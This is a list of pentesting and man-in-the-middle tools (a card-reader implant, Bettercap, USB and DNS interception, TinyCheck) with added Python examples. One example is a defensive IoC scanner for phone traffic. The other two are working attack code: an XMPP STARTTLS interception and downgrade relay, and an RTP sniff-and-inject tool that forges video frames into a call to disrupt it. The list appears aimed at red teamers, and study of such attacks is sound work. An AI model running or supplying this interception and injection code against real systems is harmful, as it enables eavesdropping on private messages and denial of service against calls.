The Tick is the next evolution in covert access control system implants. Designed for seamless integration behind card readers, The Tick silently intercepts, logs, and replays access credentials with greater efficiency and stealth than ever before. Compatible with a wide range of RFID systems, it gives red teamers invaluable insight into facility (in)security while enabling advanced credential injection.
Once installed behind an access control unit, you can interact with it over Bluetooth or Wi-Fi to configure it, extract what it has captured so far, and upgrade the firmware.
A shell script to automate the setup of a Linux router for IoT device traffic analysis and SSL MITM. It looks like it assumes that you're running it on an OpenWRT device (but I could be wrong).
A tool for testing TLS connections made by a client device or an application for certificate-validation vulnerabilities. This could also be useful if you're trying to reverse engineer the API a mobile app uses.
Intercepting and interfering with DNS traffic from your OpenWRT firewall.
USBQ is a Python-based programming framework for monitoring and modifying USB communications. It uses the kernel module from USBiquitous to implement the MITM part in the USB stack. It really does need an external device to sit between the device and the system to sniff the data. Hmm.
TinyCheck allows you to easily capture network communications from a smartphone or any device that can be associated with a Wi-Fi access point, in order to quickly analyze them. This can be used to check whether any suspect or malicious communication is outgoing from a smartphone, using heuristics or specific Indicators of Compromise (IoCs). To make it work, you need a computer with a Debian-like operating system and two Wi-Fi interfaces. The best choice is a Raspberry Pi (2+), a Wi-Fi dongle, and a small touch screen. This tiny configuration (for less than $50) allows you to tap any Wi-Fi device, anywhere.
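What "heuristics or specific IoCs" means in practice, as an added example that is not TinyCheck's own code: a scan over a constructed log of the phone's DNS queries and flows, checking them against a constructed IoC list (domain suffixes and CIDRs) plus three cheap heuristics: a DGA-looking name, a connection to an IP that no DNS answer ever produced (hard-coded C2 addresses), and cleartext HTTP. The event shape and the IoC feed format are assumptions made for the example.

```python
import ipaddress

# Constructed sample of what the capture box sees from the phone (not real traffic).
SAMPLE_EVENTS = [
    {"ts": 1, "type": "dns", "qname": "api.example-vendor.com", "answers": ["192.0.2.10"]},
    {"ts": 2, "type": "flow", "dst": "192.0.2.10", "dport": 443},
    {"ts": 3, "type": "dns", "qname": "x7k2qpz9vb.top", "answers": ["203.0.113.45"]},
    {"ts": 4, "type": "flow", "dst": "203.0.113.45", "dport": 443},
    {"ts": 5, "type": "flow", "dst": "198.51.100.7", "dport": 80},
    {"ts": 6, "type": "dns", "qname": "cdn.evil.example.net", "answers": ["203.0.113.99"]},
]

# Constructed IoC list in the shape a feed would give you: domains (suffix match) and CIDRs.
SAMPLE_IOCS = {
    "domains": {"evil.example.net", "c2.example.org"},
    "networks": [ipaddress.ip_network("198.51.100.0/24")],
}


def domain_in_iocs(qname, domains):
    """Suffix match, so a subdomain of a listed apex also hits."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in domains)


def ip_in_iocs(ip, networks):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def looks_generated(qname):
    """Cheap DGA heuristic: a long registrable label with digits mixed in and
    almost no vowels. Expect false positives on CDN hostnames; a hint, not a verdict."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return False
    label = labels[-2]
    letters = [c for c in label if c.isalpha()]
    vowels = sum(c in "aeiou" for c in letters)
    has_digit = any(c.isdigit() for c in label)
    return len(label) >= 8 and has_digit and (not letters or vowels / len(letters) < 0.25)


def scan(events, iocs):
    """Return (ts, reason, indicator) findings for the event log, in capture order."""
    resolved = set()   # every IP some DNS answer handed to the phone
    findings = []
    for ev in events:
        if ev["type"] == "dns":
            resolved.update(ev["answers"])
            if domain_in_iocs(ev["qname"], iocs["domains"]):
                findings.append((ev["ts"], "ioc-domain", ev["qname"]))
            elif looks_generated(ev["qname"]):
                findings.append((ev["ts"], "dga-like-name", ev["qname"]))
        elif ev["type"] == "flow":
            if ip_in_iocs(ev["dst"], iocs["networks"]):
                findings.append((ev["ts"], "ioc-network", ev["dst"]))
            if ev["dst"] not in resolved:
                # the app connected somewhere it never looked up: a hard-coded address
                findings.append((ev["ts"], "unresolved-destination", ev["dst"]))
            if ev["dport"] == 80:
                findings.append((ev["ts"], "cleartext-http", ev["dst"]))
    return findings


if __name__ == "__main__":
    for ts, reason, what in scan(SAMPLE_EVENTS, SAMPLE_IOCS):
        print(f"t={ts} {reason}: {what}")
```

The unresolved-destination check only works if the capture started before the app did; a DNS answer the phone already had cached will show up as a flow with no matching query. Run it for the whole session rather than a spot check.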
A Python utility that decrypts TLS-encrypted XMPP traffic by acting as an active MitM and watching for STARTTLS requests.
A proof-of-concept utility that allows DoS attacks against IP videophones by sampling RTP sequencing information and using it to inject frames from an arbitrary video stream into the conversation. It can also interact with the audio component of such a call.
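The interception point an XMPP MitM has to find, as an added example that is not the utility's own code: the relay watches the plaintext stream for the client's `<starttls/>` request and the server's `<proceed/>` answer, because that is the moment both legs must be switched to TLS (the server leg as an ordinary TLS client, the client leg as a TLS server presenting the attacker's certificate, which only a validating client will reject). The `strip` mode is a related downgrade the page does not describe, included as a comparison: deleting `<starttls>` from `<stream:features>` so the client never asks. The class and method names are assumptions for this example; socket handling and the actual TLS wrapping are left to the caller.

```python
import re

TLS_NS = b"urn:ietf:params:xml:ns:xmpp-tls"
# client asks to upgrade:  <starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>
CLIENT_STARTTLS = re.compile(rb"<starttls\b[^>]*xmlns=['\"]" + TLS_NS + rb"['\"][^>]*/>")
# server agrees:           <proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>
SERVER_PROCEED = re.compile(rb"<proceed\b[^>]*/>")
# server advertises TLS inside <stream:features>, possibly wrapping <required/>
FEATURE_STARTTLS = re.compile(rb"<starttls\b[^>]*?(?:/>|>.*?</starttls>)", re.S)


class XmppStarttlsMitm:
    """Decides, per chunk of relayed bytes, what the MitM must do with it.

    mode="intercept": forward everything; once the server has answered the
    client's STARTTLS with <proceed/>, report "upgrade" so the caller wraps
    both sockets in TLS before relaying anything else.
    mode="strip": remove the starttls feature from the server's stream features
    so the client keeps talking plaintext (downgrade; fails against clients
    that insist on TLS, and against servers that require it before SASL).
    """

    def __init__(self, mode="intercept"):
        if mode not in ("intercept", "strip"):
            raise ValueError(mode)
        self.mode = mode
        self.tls_pending = False   # client asked for TLS, server has not answered yet

    def on_client_data(self, data):
        """Returns (bytes to forward to the server, action)."""
        if self.mode == "intercept" and CLIENT_STARTTLS.search(data):
            self.tls_pending = True
        return data, "forward"

    def on_server_data(self, data):
        """Returns (bytes to forward to the client, action)."""
        if self.mode == "strip":
            stripped = FEATURE_STARTTLS.sub(b"", data)
            return stripped, ("stripped" if stripped != data else "forward")
        if self.tls_pending and SERVER_PROCEED.search(data):
            self.tls_pending = False
            # forward <proceed/> first, then wrap: client leg = ssl server with our
            # cert, server leg = ssl client to the real host; relay plaintext between them
            return data, "upgrade"
        return data, "forward"


# Constructed XMPP fragments for a stand-alone run (not captured traffic).
FEATURES = (b"<stream:features>"
            b"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls>"
            b"<mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism></mechanisms>"
            b"</stream:features>")
CLIENT_REQ = b"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
PROCEED = b"<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"


def walk(mode):
    """Replay the constructed exchange through the MitM and return the actions seen."""
    m = XmppStarttlsMitm(mode)
    out = [m.on_server_data(FEATURES), m.on_client_data(CLIENT_REQ), m.on_server_data(PROCEED)]
    return [(fwd, act) for fwd, act in out]


if __name__ == "__main__":
    for mode in ("intercept", "strip"):
        print(mode, [act for _, act in walk(mode)])
```

In intercept mode the client still performs a full TLS handshake, so whether the attack is silent depends entirely on whether the client validates the certificate it is shown; that is the same property the TLS client-testing tool above is checking.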
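What "sampling RTP sequencing information" buys the attacker, as an added example that is not the tool's own code: an RTP header parser, a tracker that learns the victim stream's SSRC, payload type, last sequence number and per-frame timestamp step from sniffed packets, and an injector that emits packets continuing that sequence so a receiver keyed on SSRC and next-sequence-number accepts them as the real stream. The "sniffed" packets are constructed inline (getting real ones needs a raw socket or a capture library) and the naive receiver is a model, not a particular phone.

```python
import struct

# Fixed 12-byte RTP header (RFC 3550 5.1): V/P/X/CC, M/PT, sequence, timestamp, SSRC.
RTP_HDR = struct.Struct("!BBHII")


def parse_rtp(pkt):
    """Header fields and payload of one RTP packet. Skips the CSRC list and the
    header extension, which is where payload offsets usually go wrong."""
    if len(pkt) < RTP_HDR.size:
        raise ValueError("short packet")
    b0, b1, seq, ts, ssrc = RTP_HDR.unpack_from(pkt)
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    off = RTP_HDR.size + 4 * (b0 & 0x0F)          # CSRC list
    if b0 & 0x10:                                  # extension header present
        _, words = struct.unpack_from("!HH", pkt, off)
        off += 4 + 4 * words
    return {"marker": bool(b1 & 0x80), "pt": b1 & 0x7F, "seq": seq,
            "ts": ts, "ssrc": ssrc, "payload": pkt[off:]}


def build_rtp(pt, seq, ts, ssrc, payload, marker=False):
    return RTP_HDR.pack(0x80, (0x80 if marker else 0) | (pt & 0x7F),
                        seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc & 0xFFFFFFFF) + payload


class StreamTracker:
    """Learn SSRC, payload type, last seq/timestamp and the frame timestamp step
    from sniffed packets of one stream; packets of other SSRCs are ignored."""

    def __init__(self):
        self.ssrc = self.pt = self.seq = self.ts = None
        self.steps = []

    def observe(self, pkt):
        h = parse_rtp(pkt)
        if self.ssrc is None:
            self.ssrc, self.pt = h["ssrc"], h["pt"]
        if h["ssrc"] != self.ssrc:
            return                                  # e.g. the audio leg of the call
        if self.ts is not None and h["ts"] != self.ts:
            self.steps.append((h["ts"] - self.ts) & 0xFFFFFFFF)
        self.seq, self.ts = h["seq"], h["ts"]

    def frame_step(self):
        # most frequent timestamp increment; 3000 = 30 fps on the 90 kHz video clock
        return max(set(self.steps), key=self.steps.count) if self.steps else 3000


def inject_frame(tracker, chunks):
    """Packets carrying one attacker frame that continue the victim's stream:
    same SSRC and PT, seq +1 per packet, timestamp advanced by one frame,
    marker bit on the last packet of the frame."""
    ts = (tracker.ts + tracker.frame_step()) & 0xFFFFFFFF
    out = []
    for i, chunk in enumerate(chunks):
        tracker.seq = (tracker.seq + 1) & 0xFFFF
        out.append(build_rtp(tracker.pt, tracker.seq, ts, tracker.ssrc, chunk,
                             marker=(i == len(chunks) - 1)))
    tracker.ts = ts
    return out


class NaiveReceiver:
    """Models a phone that plays any packet with the right SSRC and the next
    sequence number, which is all the injected packets need to satisfy."""

    def __init__(self, ssrc, last_seq):
        self.ssrc, self.expect = ssrc, (last_seq + 1) & 0xFFFF

    def accept(self, pkt):
        h = parse_rtp(pkt)
        if h["ssrc"] != self.ssrc or h["seq"] != self.expect:
            return False
        self.expect = (h["seq"] + 1) & 0xFFFF
        return True


# Constructed "sniffed" packets: three 30 fps video frames, SSRC 0xDEADBEEF, PT 96.
SNIFFED = [build_rtp(96, 1000 + i, 90000 + 3000 * i, 0xDEADBEEF, b"\x00" * 8, marker=True)
           for i in range(3)]


def demo(chunks=(b"frame-part-1", b"frame-part-2")):
    """Sniff, inject one two-packet frame, and report parsed headers plus receiver verdicts."""
    t = StreamTracker()
    for p in SNIFFED:
        t.observe(p)
    rx = NaiveReceiver(t.ssrc, t.seq)
    injected = inject_frame(t, list(chunks))
    return [parse_rtp(p) for p in injected], [rx.accept(p) for p in injected]


if __name__ == "__main__":
    hdrs, ok = demo()
    for h, a in zip(hdrs, ok):
        print(f"seq={h['seq']} ts={h['ts']} marker={h['marker']} accepted={a}")
```

The real stream keeps sending too, so the genuine packets arriving with the same sequence numbers collide with the injected ones; which side wins is up to the receiver's jitter buffer, and outpacing the legitimate sender is what turns this from a glitch into the DoS the page mentions. Nothing here touches SRTP: with authenticated RTP the injected packets fail the MAC check.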
Bettercap is a modular man-in-the-middle attack tool written in Go. It makes it easy to write your own proxies to attack traffic from the sidelines, and it runs on pretty much any worthwhile pentesting platform.
How to build a personal GSM cellular network using Linux, a Raspberry Pi, and an SDR.